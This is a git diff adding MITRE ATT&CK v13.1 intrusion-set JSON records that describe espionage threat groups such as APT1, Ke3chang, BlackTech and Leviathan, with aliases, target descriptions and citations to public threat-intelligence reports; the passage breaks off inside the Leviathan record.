@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--fd9bdbe5-cfec-46a9-9dd0-6bae726208a5", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T18:50:40.179Z", + "name": "Aoqin Dragon", + "description": "[Aoqin Dragon](https://attack.mitre.org/groups/G1007) is a suspected Chinese cyber espionage threat group that has been active since at least 2013. [Aoqin Dragon](https://attack.mitre.org/groups/G1007) has primarily targeted government, education, and telecommunication organizations in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. Security researchers noted a potential association between [Aoqin Dragon](https://attack.mitre.org/groups/G1007) and UNC94, based on malware, infrastructure, and targets.(Citation: SentinelOne Aoqin Dragon June 2022)", + "aliases": [ + "Aoqin Dragon" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Hiroki Nagahama, NEC Corporation", + "Pooja Natarajan, NEC Corporation India", + "Manikantan Srinivasan, NEC Corporation India" + ], + "type": "intrusion-set", + "id": "intrusion-set--64d5f96a-f121-4d19-89f6-6709f5c49faa", + "created": "2022-07-14T14:32:47.582Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1007", + "external_id": "G1007" + }, + { + "source_name": "SentinelOne Aoqin Dragon June 2022", + "description": "Chen, Joey. (2022, June 9). Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years. 
Retrieved July 14, 2022.", + "url": "https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6566aac9-dad8-4332-ae73-20c23bad7f02.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6566aac9-dad8-4332-ae73-20c23bad7f02.json new file mode 100644 index 0000000000000000000000000000000000000000..89ba7ec1720eec727a21ca6c354a4db6759c69d1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6566aac9-dad8-4332-ae73-20c23bad7f02.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--2c524cca-6eca-4572-a98f-febd782cf9a6", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Ferocious Kitten" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Pooja Natarajan, NEC Corporation India", + "Manikantan Srinivasan, NEC Corporation India", + "Hiroki Nagahama, NEC Corporation" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--6566aac9-dad8-4332-ae73-20c23bad7f02", + "type": "intrusion-set", + "created": "2021-09-28T17:41:12.950Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0137", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0137" + }, + { + "source_name": "Kaspersky Ferocious Kitten Jun 2021", + "url": "https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/", + "description": "GReAT. (2021, June 16). Ferocious Kitten: 6 Years of Covert Surveillance in Iran. Retrieved September 22, 2021." + } + ], + "modified": "2021-10-25T14:28:10.337Z", + "name": "Ferocious Kitten", + "description": "[Ferocious Kitten](https://attack.mitre.org/groups/G0137) is a threat group that has primarily targeted Persian-speaking individuals in Iran since at least 2015.(Citation: Kaspersky Ferocious Kitten Jun 2021)", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6688d679-ccdb-4f12-abf6-c7545dd767a4.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6688d679-ccdb-4f12-abf6-c7545dd767a4.json new file mode 100644 index 0000000000000000000000000000000000000000..be8cde5bdc1df29dbbdc797bcd090570c0713f5c --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6688d679-ccdb-4f12-abf6-c7545dd767a4.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--cf0c73ee-d5af-4b5f-9a8d-edfa915a8b2e", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "The White Company" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--6688d679-ccdb-4f12-abf6-c7545dd767a4", + "type": "intrusion-set", + "created": "2019-05-02T00:08:18.314Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0089", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0089" + }, + { + "description": "Livelli, K, et al. (2018, November 12). Operation Shaheen. Retrieved May 1, 2019.", + "url": "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/WhiteCompanyOperationShaheenReport.pdf?_ga=2.161661948.1943296560.1555683782-1066572390.1555511517", + "source_name": "Cylance Shaheen Nov 2018" + } + ], + "modified": "2020-03-30T19:24:52.290Z", + "name": "The White Company", + "description": "[The White Company](https://attack.mitre.org/groups/G0089) is a likely state-sponsored threat actor with advanced capabilities. From 2017 through 2018, the group led an espionage campaign called Operation Shaheen targeting government and military organizations in Pakistan.(Citation: Cylance Shaheen Nov 2018)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6713ab67-e25b-49cc-808d-2b36d4fbc35c.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6713ab67-e25b-49cc-808d-2b36d4fbc35c.json new file mode 100644 index 0000000000000000000000000000000000000000..850d87aa1a8f60f323d8fe6c3ef678f4d8f68a56 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6713ab67-e25b-49cc-808d-2b36d4fbc35c.json 
@@ -0,0 +1,106 @@ +{ + "type": "bundle", + "id": "bundle--f90fbb7f-e028-4d9a-943f-51d7cc4cfebc", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Ke3chang", + "APT15", + "Mirage", + "Vixen Panda", + "GREF", + "Playful Dragon", + "RoyalAPT", + "NICKEL" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Pooja Natarajan, NEC Corporation India", + "Manikantan Srinivasan, NEC Corporation India", + "Hiroki Nagahama, NEC Corporation" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--6713ab67-e25b-49cc-808d-2b36d4fbc35c", + "created": "2017-05-31T21:31:47.177Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G0004", + "url": "https://attack.mitre.org/groups/G0004" + }, + { + "source_name": "RoyalAPT", + "description": "(Citation: APT15 Intezer June 2018)" + }, + { + "source_name": "NICKEL", + "description": "(Citation: Microsoft NICKEL December 2021)" + }, + { + "source_name": "APT15", + "description": "(Citation: NCC Group APT15 Alive and Strong)" + }, + { + "source_name": "Mirage", + "description": "(Citation: NCC Group APT15 Alive and Strong)" + }, + { + "source_name": "GREF", + "description": "(Citation: NCC Group APT15 Alive and Strong)" + }, + { + "source_name": "Vixen Panda", + "description": "(Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018)" + }, + { + "source_name": "Playful Dragon", + "description": "(Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018)" + }, + { + "source_name": "Ke3chang", + "description": "(Citation: Villeneuve et al 2014) (Citation: NCC Group APT15 Alive and Strong) (Citation: APT15 Intezer June 2018)" + }, + { + "source_name": "Microsoft NICKEL December 2021", + "url": 
"https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe", + "description": "MSTIC. (2021, December 6). NICKEL targeting government organizations across Latin America and Europe. Retrieved March 18, 2022." + }, + { + "source_name": "APT15 Intezer June 2018", + "url": "https://web.archive.org/web/20180615122133/https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/", + "description": "Rosenberg, J. (2018, June 14). MirageFox: APT15 Resurfaces With New Tools Based On Old Ones. Retrieved September 21, 2018." + }, + { + "source_name": "NCC Group APT15 Alive and Strong", + "url": "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "description": "Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018." + }, + { + "source_name": "Mandiant Operation Ke3chang November 2014", + "url": "https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs", + "description": "Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., & Geers, K. (2014). OPERATION \u201cKE3CHANG\u201d: Targeted Attacks Against Ministries of Foreign Affairs. Retrieved November 12, 2014." + }, + { + "source_name": "Villeneuve et al 2014", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "description": "Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., & Geers, K. (2014). OPERATION \u201cKE3CHANG\u201d: Targeted Attacks Against Ministries of Foreign Affairs. Retrieved November 12, 2014." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Ke3chang](https://attack.mitre.org/groups/G0004) is a threat group attributed to actors operating out of China. 
[Ke3chang](https://attack.mitre.org/groups/G0004) has targeted oil, government, diplomatic, military, and NGOs in Central and South America, the Caribbean, Europe, and North America since at least 2010.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018)(Citation: Microsoft NICKEL December 2021)", + "modified": "2022-07-22T18:52:32.762Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Ke3chang", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6.json new file mode 100644 index 0000000000000000000000000000000000000000..674c156e166fbb64d269c807a733a817a4b88c21 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--fbc3b716-49c9-426c-a9d1-cfab8a3e9098", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "id": "intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6", + "type": "intrusion-set", + "created": "2018-01-16T16:13:52.465Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0057", + "external_id": "G0057" + } + ], + "modified": "2018-10-17T00:17:13.469Z", + "name": "APT34", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662.json new file mode 100644 index 0000000000000000000000000000000000000000..1865a1290236bc38cc7655a9f85eace7a97cce04 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662.json 
@@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--46625d69-5028-4751-a476-58a253acc72a", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "APT1", + "Comment Crew", + "Comment Group", + "Comment Panda" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "type": "intrusion-set", + "created": "2017-05-31T21:31:47.955Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0006", + "external_id": "G0006" + }, + { + "source_name": "APT1", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Crew", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Group", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Comment Panda", + "description": "(Citation: CrowdStrike Putter Panda)" + }, + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "source_name": "Mandiant APT1" + }, + { + "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf", + "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. 
Retrieved January 22, 2016.", + "source_name": "CrowdStrike Putter Panda" + } + ], + "modified": "2021-05-26T12:23:48.842Z", + "name": "APT1", + "description": "[APT1](https://attack.mitre.org/groups/G0006) is a Chinese threat group that has been attributed to the 2nd Bureau of the People\u2019s Liberation Army (PLA) General Staff Department\u2019s (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. (Citation: Mandiant APT1)", + "x_mitre_version": "1.4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e.json new file mode 100644 index 0000000000000000000000000000000000000000..2305eeec373ed200e610c5d33a8e13b4ee3e5807 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e.json 
@@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--a313e17c-de75-4932-9247-6b7dcf18c2c5", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-19T21:44:20.477Z", + "name": "Frankenstein", + "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) is a campaign carried out between January and April 2019 by unknown threat actors. The campaign name comes from the actors' ability to piece together several unrelated components.(Citation: Talos Frankenstein June 2019) ", + "aliases": [ + "Frankenstein" + ], + "x_mitre_deprecated": true, + "x_mitre_version": "1.1", + "type": "intrusion-set", + "id": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e", + "created": "2020-05-11T15:21:09.438Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0101", + "external_id": "G0101" + }, + { + "source_name": "Talos Frankenstein June 2019", + "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020.", + "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6b9ebeb5-20bf-48b0-afb7-988d769a2f01.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6b9ebeb5-20bf-48b0-afb7-988d769a2f01.json new file mode 100644 index 0000000000000000000000000000000000000000..28b418a968e7bdb789544e96a8d1b60892608d89 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6b9ebeb5-20bf-48b0-afb7-988d769a2f01.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--49ff7453-0f4a-48ec-85b8-d3a5c6685681", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "DarkHydrus" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Oleg Skulkin, Group-IB" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--6b9ebeb5-20bf-48b0-afb7-988d769a2f01", + "type": "intrusion-set", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0079", + "external_id": "G0079" + }, + { + "source_name": "DarkHydrus", + "description": "(Citation: Unit 42 DarkHydrus July 2018)" + }, + { + "url": "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/", + "description": "Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018.", + "source_name": "Unit 42 DarkHydrus July 2018" + }, + { + "url": "https://pan-unit42.github.io/playbook_viewer/", + "description": "Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.", + "source_name": "Unit 42 Playbook Dec 2017" + } + ], + "modified": "2021-10-12T19:52:22.454Z", + "name": "DarkHydrus", + "description": "[DarkHydrus](https://attack.mitre.org/groups/G0079) is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016. The group heavily leverages open-source tools and custom payloads for carrying out attacks. (Citation: Unit 42 DarkHydrus July 2018) (Citation: Unit 42 Playbook Dec 2017)", + "x_mitre_version": "1.3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6eded342-33e5-4451-b6b2-e1c62863129f.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6eded342-33e5-4451-b6b2-e1c62863129f.json new file mode 100644 index 0000000000000000000000000000000000000000..996abc542efca721ef89b0a1d5d556b5ac730b48 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6eded342-33e5-4451-b6b2-e1c62863129f.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--23fd7cc0-fd20-4ec3-aeca-c01e35ecd1e9", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Confucius", + "Confucius APT" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--6eded342-33e5-4451-b6b2-e1c62863129f", + "created": "2021-12-26T23:11:39.442Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G0142", + "url": "https://attack.mitre.org/groups/G0142" + }, + { + "source_name": "TrendMicro Confucius APT Feb 2018", + "url": "https://www.trendmicro.com/en_us/research/18/b/deciphering-confucius-cyberespionage-operations.html", + "description": "Lunghi, D and Horejsi, J. (2018, February 13). Deciphering Confucius: A Look at the Group's Cyberespionage Operations. Retrieved December 26, 2021." + }, + { + "source_name": "TrendMicro Confucius APT Aug 2021", + "url": "https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html", + "description": "Lunghi, D. (2021, August 17). Confucius Uses Pegasus Spyware-related Lures to Target Pakistani Military. Retrieved December 26, 2021." + }, + { + "source_name": "Uptycs Confucius APT Jan 2021", + "url": "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat", + "description": "Uptycs Threat Research Team. (2021, January 12). Confucius APT deploys Warzone RAT. Retrieved December 17, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Confucius](https://attack.mitre.org/groups/G0142) is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. 
Security researchers have noted similarities between [Confucius](https://attack.mitre.org/groups/G0142) and [Patchwork](https://attack.mitre.org/groups/G0040), particularly in their respective custom malware code and targets.(Citation: TrendMicro Confucius APT Feb 2018)(Citation: TrendMicro Confucius APT Aug 2021)(Citation: Uptycs Confucius APT Jan 2021)", + "modified": "2022-06-30T20:15:32.697Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Confucius", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8.json new file mode 100644 index 0000000000000000000000000000000000000000..aa21dfbe16c0c0226dca6b2e4ae832b95c90ff3d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8.json 
@@ -0,0 +1,66 @@
+{
+ "type": "bundle",
+ "id": "bundle--bc598fca-f762-465d-af88-58032cf05283",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "aliases": [
+ "BlackTech",
+ "Palmerworm"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_contributors": [
+ "Tatsuya Daitoku, Cyber Defense Institute, Inc.",
+ "Hannah Simes, BT Security"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "intrusion-set",
+ "id": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
+ "created": "2020-05-05T18:36:45.970Z",
+ "x_mitre_version": "2.0",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "G0098",
+ "url": "https://attack.mitre.org/groups/G0098"
+ },
+ {
+ "source_name": "Palmerworm",
+ "description": "(Citation: Symantec Palmerworm Sep 2020)(Citation: IronNet BlackTech Oct 2021)"
+ },
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ },
+ {
+ "source_name": "IronNet BlackTech Oct 2021",
+ "url": "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
+ "description": "Demboski, M., et al. (2021, October 26). China cyber attacks: the current threat landscape. Retrieved March 25, 2022."
+ },
+ {
+ "source_name": "Reuters Taiwan BlackTech August 2020",
+ "url": "https://www.reuters.com/article/us-taiwan-cyber-china/taiwan-says-china-behind-cyberattacks-on-government-agencies-emails-idUSKCN25F0JK",
+ "description": "Lee, Y. (2020, August 19). Taiwan says China behind cyberattacks on government agencies, emails. Retrieved April 6, 2022."
+ },
+ {
+ "source_name": "Symantec Palmerworm Sep 2020",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt",
+ "description": "Threat Intelligence. (2020, September 29). Palmerworm: Espionage Gang Targets the Media, Finance, and Other Sectors. Retrieved March 25, 2022."
+ }
+ ],
+ "x_mitre_deprecated": false,
+ "revoked": false,
+ "description": "[BlackTech](https://attack.mitre.org/groups/G0098) is a suspected Chinese cyber espionage group that has primarily targeted organizations in East Asia--particularly Taiwan, Japan, and Hong Kong--and the US since at least 2013. [BlackTech](https://attack.mitre.org/groups/G0098) has used a combination of custom malware, dual-use tools, and living off the land tactics to compromise media, construction, engineering, electronics, and financial company networks.(Citation: TrendMicro BlackTech June 2017)(Citation: Symantec Palmerworm Sep 2020)(Citation: Reuters Taiwan BlackTech August 2020)",
+ "modified": "2022-04-06T13:14:27.477Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "BlackTech",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7113eaa5-ba79-4fb3-b68a-398ee9cd698e.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7113eaa5-ba79-4fb3-b68a-398ee9cd698e.json
new file mode 100644
index 0000000000000000000000000000000000000000..a1cd6a832b12ac8ba1321fbd7834ac0aae40a434
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7113eaa5-ba79-4fb3-b68a-398ee9cd698e.json
@@ -0,0 +1,119 @@
+{
+ "type": "bundle",
+ "id": "bundle--6ef1ca90-440b-4481-82f5-0439e4a4b0fb",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "aliases": [
+ "Leviathan",
+ "MUDCARP",
+ "Kryptonite Panda",
+ "Gadolinium",
+ "BRONZE MOHAWK",
+ "TEMP.Jumper",
+ "APT40",
+ "TEMP.Periscope"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_contributors": [
+ "Valerii Marchuk, Cybersecurity Help s.r.o."
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "intrusion-set",
+ "id": "intrusion-set--7113eaa5-ba79-4fb3-b68a-398ee9cd698e",
+ "created": "2018-04-18T17:59:24.739Z",
+ "x_mitre_version": "3.0",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "G0065",
+ "url": "https://attack.mitre.org/groups/G0065"
+ },
+ {
+ "source_name": "MUDCARP",
+ "description": "(Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019)"
+ },
+ {
+ "source_name": "Kryptonite Panda",
+ "description": "(Citation: CISA AA21-200A APT40 July 2021)(Citation: Crowdstrike KRYPTONITE PANDA August 2018)"
+ },
+ {
+ "source_name": "Gadolinium",
+ "description": "(Citation: CISA AA21-200A APT40 July 2021)(Citation: MSTIC GADOLINIUM September 2020)"
+ },
+ {
+ "source_name": "BRONZE MOHAWK",
+ "description": "(Citation: CISA AA21-200A APT40 July 2021)(Citation: SecureWorks BRONZE MOHAWK n.d.)"
+ },
+ {
+ "source_name": "Leviathan",
+ "description": "(Citation: Proofpoint Leviathan Oct 2017)"
+ },
+ {
+ "source_name": "TEMP.Jumper",
+ "description": "[Leviathan](https://attack.mitre.org/groups/G0065) was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: CISA AA21-200A APT40 July 2021)(Citation: FireEye APT40 March 2019)"
+ },
+ {
+ "source_name": "TEMP.Periscope",
+ "description": "[Leviathan](https://attack.mitre.org/groups/G0065) was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: CISA AA21-200A APT40 July 
2021)(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019)"
+ },
+ {
+ "source_name": "Accenture MUDCARP March 2019",
+ "url": "https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies",
+ "description": "Accenture iDefense Unit. (2019, March 5). Mudcarp's Focus on Submarine Technologies. Retrieved August 24, 2021."
+ },
+ {
+ "source_name": "Crowdstrike KRYPTONITE PANDA August 2018",
+ "url": "https://www.crowdstrike.com/blog/two-birds-one-stone-panda/",
+ "description": "Adam Kozy. (2018, August 30). Two Birds, One Stone Panda. Retrieved August 24, 2021."
+ },
+ {
+ "source_name": "Proofpoint Leviathan Oct 2017",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets",
+ "description": "Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018."
+ },
+ {
+ "source_name": "MSTIC GADOLINIUM September 2020",
